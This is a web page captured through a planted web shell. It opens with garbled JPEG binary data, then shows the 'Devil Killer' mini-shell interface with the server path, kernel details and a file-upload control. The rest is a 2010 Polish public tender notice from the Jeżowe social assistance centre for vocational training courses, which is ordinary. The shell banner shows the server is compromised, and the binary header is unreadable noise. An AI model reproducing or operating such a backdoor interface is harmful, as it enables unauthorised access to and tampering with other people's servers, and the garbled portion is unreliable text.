JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100414/104230-N-2010.html

<p class="kh_header"><b>Jeżowe: Kompleksowa organizacja szkoleń dla uczestników projektu: CZAS NA AKTYWNOŚĆ W GMINIE JEŻOWE</b><br>
<b>Numer ogłoszenia: 104230 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , Jeżowe 136a, 37-430 Jeżowe, woj. podkarpackie, tel. 15 8794900, faks 15 8794342.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jezowe.bip.info.pl, www.opsjezowe.cba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ośrodek pomocy społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa organizacja szkoleń dla uczestników projektu: CZAS NA AKTYWNOŚĆ W GMINIE JEŻOWE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu kompleksowej organizacji szkoleń oraz kursów zawodowych dla 27  uczestników projektu Czas na aktywność w gminie Jeżowe współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
2.Przedmiot zamówienia obejmuje przeprowadzenie szkoleń w następującym zakresie:
1)Kucharz z elementami cateringu i organizacją przyjęć:
a)Czas trwania kursu: 250 godzin (w tym na zajęcia praktyczne powinno przypadać około 160 godzin, natomiast na zajęcia teoretyczne około 90 godzin);
b) Liczba uczestników: 1 grupa - 12 osób; 
c)Miejsce szkolenia: teren gminy Jeżowe;
d)Termin przeprowadzenia szkolenia: lipiec  -  sierpień 2010 r.;
e)Zagadnienia wymagane w programie kursu:
Technologia gastronomiczna z towaroznawstwem, higiena w procesie produkcji żywności, zasady racjonalnego żywienia, przyjęcia okolicznościowe - sprzęt i urządzenia, nakrycia na stoły okolicznościowe, zasady dekoracji stołów i potraw, obsługa konsumenta, techniki noszenia naczyń i tac, zasady serwowania dań zasadniczych, deserów, napojów bezalkoholowych zimnych i gorących, napojów alkoholowych, potrawy cateringowe, aranżacje stołów i sal, aspekty sanitarno - higieniczne przy produkcji i obrocie żywnością;
f)Zajęcia mogą być przeprowadzane  w  dni  robocze  od  poniedziałku do piątku w godzinach 8:00 do 15:00. Harmonogram zajęć należy skonstruować tak by tygodniowo wypadało co  najmniej 35 godzin zajęć. Osoby skierowane na kurs będą posiadały aktualne  badania  lekarskie;
g)Kurs  powinien  kończyć  się  egzaminem  oraz  wydaniem  zaświadczenia  o  jego ukończeniu zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia  03.02.2006 r.  w  sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych. Szkolenie powinno zostać przeprowadzone zgodnie ze standardami zawartymi w Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 02.03.2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy;
h)W cenę zamówienia Wykonawca powinien wliczyć następujące koszty:
-zapewnienia wszystkim uczestnikom kursu  materiałów i pomocy dydaktycznych (podręczników, poradników z zakresu technologii gastronomicznej, organizacji przyjęć oraz potraw cateringowych) potrzebnych do przyswojenia wiedzy teoretycznej, a także materiałów biurowych w postaci notatników i długopisów. Materiały szkoleniowe o których mowa uczestnicy kursów otrzymają na własność;
-zapewnienia odzieży ochronnej w postaci fartucha oraz  nakrycia głowy. Odzież ochronna zostanie przekazana nieodpłatnie kursantom;
-materiałów, urządzeń oraz produktów i surowców niezbędnych do przeprowadzenia zajęć praktycznych;
-zapewnienia odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych (sal wykładowych i kuchni) wyposażonych w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia zapewniające bezpieczne i higieniczne warunki pracy i nauki;
-przekazania Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych;
-ubezpieczenia uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia;
-zapewnienia każdego dnia cateringu dla wszystkich uczestników kursów, w postaci jednego dania obiadowego (od poniedziałku do piątku danie mięsne, piątek danie bezmięsne), z tym że dla uczestników kursu Kucharz Wykonawca powinien wyłączyć zapewnienie obiadu w trakcie zajęć praktycznych obejmujących zajęcia z przygotowywania posiłków;
i)Zamawiający zapewni uczestnikom kursów serwis kawowy, napoje zimne oraz słodki poczęstunek;
2)Profesjonalny sprzedawca z obsługą komputera i kasy fiskalnej oraz  umiejętnością fakturowania:
a)Czas trwania kursu: 180 godzin (w tym na zajęcia praktyczne z obsługi komputera i kas fiskalnych powinno przypadać co najmniej 110 godzin, na zajęcia teoretyczne powinno przypadać około 70 godzin);
b)Liczba uczestników: 1 grupa - 11 osób; 
c)Miejsce szkolenia: teren gminy Jeżowe;
d)Termin przeprowadzenia szkolenia: lipiec  -  sierpień 2010 r.;
e)Zagadnienia wymagane w programie kursu:
obsługa komputera w zakresie systemu Windows oraz elementów pakietu MS Office XP, zagadnienia prawne dotyczące handlu, ewidencja obrotu towarowego, dokumentowanie sprzedaży, obsługa komputerowych programów użytkowych zakresie sprzedaży i gospodarki magazynowej , obsługa kas fiskalnych, standardy obsługi klienta w handlu, wybrane zagadnienia z towaroznawstwa, organizacja procesu sprzedaży i elementy marketingu, Aspekty higieniczno- sanitarne przy produkcji i obrocie środkami spożywczymi;
f)Zajęcia mogą być przeprowadzane  w  dni  robocze  od  poniedziałku do piątku w godzinach 8:00 do 15:00. Harmonogram zajęć należy skonstruować tak by tygodniowo wypadało co  najmniej 30 godzin zajęć. Osoby skierowane na kurs będą posiadały aktualne  badania  lekarskie;
g)Kurs  powinien  kończyć  się  egzaminem  oraz  wydaniem  zaświadczenia  o  jego ukończeniu zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia  03.02.2006 r.  w  sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych. Szkolenie powinno zostać przeprowadzone zgodnie ze standardami zawartymi w Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 02.03.2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy;
h)W cenę zamówienia Wykonawca powinien wliczyć następujące koszty:
-zapewnienia wszystkim uczestnikom kursów materiałów i pomocy dydaktycznych (podręczników,  poradników ) potrzebnych do przyswojenia wiedzy teoretycznej, a także materiałów biurowych w postaci notatników i długopisów. Materiały szkoleniowe o których mowa uczestnicy kursów otrzymają na własność;
-zapewnienia urządzeń potrzebnych do przeprowadzenia zajęć praktycznych;
-zapewnienia odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych (sal wykładowych wyposażonych w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia (tablica sucho ścieralną, Flip chart, laptop, projektor), zapewniające bezpieczne i higieniczne warunki pracy i nauki;
-przekazania Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych;
-ubezpieczenia uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia;
-zapewnienia każdego dnia cateringu dla wszystkich uczestników kursów, w postaci jednego dania obiadowego (od poniedziałku do piątku danie mięsne, piątek danie bezmięsne);
i)Zamawiający zapewni uczestnikom kursów serwis kawowy, napoje zimne oraz słodki poczęstunek;
3)Fryzjer z egzaminem czeladniczym:
a)Czas trwania kursu: 250 godzin (w tym na zajęcia praktyczne powinno przypadać co najmniej 200 godzin, na zajęcia teoretyczne powinno przypadać około 50 godzin;
b)Liczba uczestników: 1 osoba; 
c)Miejsce szkolenia: teren powiatu niżańskiego i stalowowolskiego;
d)Termin przeprowadzenia szkolenia: lipiec  -  sierpień 2010 r.;
e)Zagadnienia wymagane w programie kursu:
higiena zawodowa, podstawy chemiczne materiałów fryzjerskich, technologie fryzjerskie, praktyczna nauka zawodu;
f)Zajęcia mogą być przeprowadzane  w  dni  robocze  od  poniedziałku do piątku w godzinach 9:00 do 16:00. Harmonogram zajęć należy skonstruować tak by tygodniowo wypadało co  najmniej 30 godzin zajęć. Osoba skierowana na kurs będzie posiadała aktualne  badania  lekarskie;
g)Kurs powinien kończyć się egzaminem na tytuł czeladnika w zawodzie Fryzjerstwo  zgodnie  z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 października 2005r. w sprawi  egzaminów na tytuły czeladnika i mistrza w zawodzie , przeprowadzanych przez komisje egzaminacyjne izb rzemieślniczych. Szkolenie powinno zostać przeprowadzone zgodnie ze  standardami zawartymi w Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 02.03.2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy;
h)W cenę zamówienia Wykonawca powinien wliczyć następujące koszty:
-zapewnienia uczestnikowi kursu materiałów i pomocy dydaktycznych (podręczników, poradników) potrzebnych do przyswojenia wiedzy teoretycznej, a także materiałów biurowych w postaci notatników i długopisów. Materiały szkoleniowe o których mowa uczestnik kursu otrzyma na własność;
-zapewnienia urządzeń potrzebnych do przeprowadzenia zajęć praktycznych;
-zapewnienia odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych (sal wykładowych wyposażonych w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia (tablica sucho ścieralną, Flip chart, laptop, projektor), zapewniające bezpieczne i higieniczne warunki pracy i nauki;
-przekazania Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych;
-ubezpieczenia uczestnika kursu od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia;
-zapewnienia każdego dnia cateringu dla uczestnika kursu, w postaci jednego dania obiadowego (od poniedziałku do piątku danie mięsne, piątek danie bezmięsne);
-koszt przeprowadzenia egzaminu, wydania   zaświadczenia;
-zapewnienia odzieży ochronnej w postaci profesjonalnego fartucha. Odzież ochronna zostanie przekazana nieodpłatnie kursantowi;
4)Obsługa komputera od podstaw:
a)Czas trwania kursu: 80 godzin;
b)Kurs dla osób niepełnosprawnych;
c)Liczba uczestników: 3 osoby; 
d)Miejsce szkolenia: Środowiskowy Dom Samopomocy w Kamieniu;
e)Termin przeprowadzenia szkolenia: czerwiec  -  lipiec 2010 r.; 
f)Zagadnienia wymagane w programie kursu:
podstawy obsługi komputera, środowisko Windows, obsługa programów WORD, EXEL, praca w Internecie: wyszukiwanie informacji, e-mail;
g)Zajęcia mogą być przeprowadzane w dni robocze od poniedziałku do piątku w godzinach 9:00 do 14:00. Harmonogram zajęć należy skonstruować tak by tygodniowo wypadało co  najmniej 15 godzin zajęć;
h)Kurs  powinien  kończyć  się  egzaminem  oraz  wydaniem  zaświadczenia  o  jego ukończeniu zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia  03.02.2006 r.  w  sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych. Szkolenie powinno zostać przeprowadzone zgodnie ze standardami zawartymi w Rozporządzeniu Ministra Pracy i Polityki Społecznej z dnia 02.03.2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy.
i)W cenę zamówienia Wykonawca powinien wliczyć następujące koszty:
-zapewnienia wszystkim uczestnikom kursów materiałów i pomocy dydaktycznych (podręczników, poradników) potrzebnych do przyswojenia wiedzy teoretycznej, a także materiałów biurowych w postaci notatników i długopisów. Materiały szkoleniowe o których mowa uczestnicy kursów otrzymają na własność;
-zapewnienia urządzeń potrzebnych do przeprowadzenia zajęć praktycznych;
-zapewnienia odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych (sal wykładowych wyposażonych w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia (tablica sucho ścieralną, Flip chart, laptop, projektor), zapewniające bezpieczne i higieniczne warunki pracy i nauki;
-przekazania Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych;
-ubezpieczenia uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia;
-zapewnienia każdego dnia cateringu dla wszystkich uczestników kursów, w postaci jednego dania obiadowego (od poniedziałku do piątku danie mięsne, piątek danie bezmięsne);
j)Zamawiający zapewni uczestnikom kursów serwis kawowy, napoje zimne oraz słodki poczęstunek;
5)Psycholog:
a)Przedmiotem zamówienia jest udzielenie poradnictwa i wsparcia indywidualnego oraz grupowego w zakresie podniesienia kompetencji życiowych i umiejętności  społeczno -zawodowych umożliwiających docelowo powrót do życia społecznego w tym powrót na rynek pracy i aktywizację zawodową dla 27 uczestników projektu Czas na aktywność w gminie Jeżowe.
b)Czas trwania kursu: 
Grupa I i II: 1 godzina poradnictwa indywidualnego dla każdego UP (wsparcie uzależnione od indywidualnych potrzeb uczestnika) oraz 24 godziny poradnictwa grupowego.
Grupa III: 2 godziny indywidualnego dla każdego UP (wsparcie uzależnione od indywidualnych potrzeb uczestnika) 10 godzin poradnictwa grupowego.
c)Liczba uczestników: Grupa I - 12 osób, Grupa II - 12 osób, Grupa III - 3 osoby; 
d)Miejsce szkolenia:
Grupa I i II: teren gminy Jeżowe.
Grupa III: Środowiskowy Dom Samopomocy w Kamieniu.
e)Termin przeprowadzenia szkolenia: maj  -  czerwiec 2010 r.;
f)Zagadnienia wymagane w programie kursu:
komunikacja interpersonalna, trudne sytuacje - jak sobie z nimi radzić, asertywność, stres- jak sobie z nim radzić, Wyznaczanie celów, Siła pozytywnego myślenia, wartości i zasady w pracy i życiu, umiejętności społeczne;
g)Zajęcia mogą być przeprowadzane w dni robocze od poniedziałku do piątku w godzinach 8:00 do 18:00. Harmonogram zajęć należy skonstruować tak by tygodniowo wypadało co  najmniej 24 godziny zajęć;
h)W cenę zamówienia Wykonawca powinien wliczyć następujące koszty:
-zapewnienia wszystkim uczestnikom kursów materiałów i pomocy dydaktycznych (podręczników, poradników) potrzebnych do przyswojenia wiedzy teoretycznej, a także materiałów biurowych w postaci notatników i długopisów. Materiały szkoleniowe o których mowa uczestnicy kursów otrzymają na własność;
-zapewnienia odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych (sal wykładowych wyposażonych w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia (tablica sucho ścieralną, Flip chart, laptop, projektor), zapewniające bezpieczne i higieniczne warunki pracy i nauki;
-przekazania Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych; 
-ubezpieczenia uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia;
i)Zamawiający zapewni uczestnikom kursów serwis kawowy, napoje zimne oraz słodki poczęstunek;
6)Usługi doradcy zawodowego:
a)Czas trwania kursu: 
Grupa I i II: 1 godzina poradnictwa indywidualnego dla każdego UP (wsparcie uzależnione od indywidualnych potrzeb uczestnika) oraz 12 godziny poradnictwa grupowego.
Grupa III: 1 godzina indywidualnego dla każdego UP (wsparcie uzależnione od indywidualnych potrzeb uczestnika) 10 godzin poradnictwa grupowego.
b)Liczba uczestników: Grupa I - 12 osób, Grupa II - 12 osób, Grupa III - 3 osoby; 
c)Miejsce szkolenia:
Grupa I i II: teren gminy Jeżowe.
Grupa III: Środowiskowy Dom Samopomocy w Kamieniu.
d)Termin przeprowadzenia szkolenia: czerwiec 2010 r.;
e)Zagadnienia wymagane w programie kursu:
opracowanie podstawowych dokumentów - CV, list motywacyjny, podanie, techniki poszukiwania pracy, skuteczna komunikacja i autoprezentacja w kontekście rozmów kwalifikacyjnych;
f)Zajęcia mogą być przeprowadzane w dni robocze od poniedziałku do piątku w godzinach 8:00 do 18:00. Harmonogram zajęć należy skonstruować tak by tygodniowo wypadało co najmniej 20 godzin zajęć.
g)W cenę zamówienia Wykonawca powinien wliczyć następujące koszty:
-zapewnienia wszystkim uczestnikom kursów materiałów i pomocy dydaktycznych (podręczników, poradników, skryptów) potrzebnych do przyswojenia wiedzy teoretycznej, a także materiałów biurowych w postaci notatników i długopisów. Materiały szkoleniowe o których mowa uczestnicy kursów otrzymają na własność;
-zapewnienia odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych (sal wykładowych wyposażonych w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizację kształcenia (tablica sucho ścieralną, Flip chart, laptop, projektor), zapewniające bezpieczne i higieniczne warunki pracy i nauki;
-przekazania Zamawiającemu po jednym egzemplarzu materiałów szkoleniowych i dydaktycznych; 
-ubezpieczenia uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie oraz w drodze do i z miejsca szkolenia - od pierwszego do ostatniego dnia szkolenia;
h)Zamawiający zapewni uczestnikom kursów serwis kawowy, napoje zimne oraz słodki poczęstunek.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek, jeżeli posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy, właściwy ze względu na siedzibę instytucji szkoleniowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy p.z.p;
2)Zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej, wydane zgodnie z art.20 ust. 4 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69 poz. 415 z późn. zm.);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jezowe.bip.info.pl, www.opsjezowe.cba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Jeżowem,
Jeżowe 136a, 37-430 Jeżowe 
Biuro Kierownika Ośrodka Pomocy Społecznej pok. 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2010 godzina 10:00, miejsce: Urząd Gminy w Jeżowem,
Jeżowe 136a, 37-430 Jeżowe 
Biuro Kierownika Ośrodka Pomocy Społecznej pok. 19.</p>
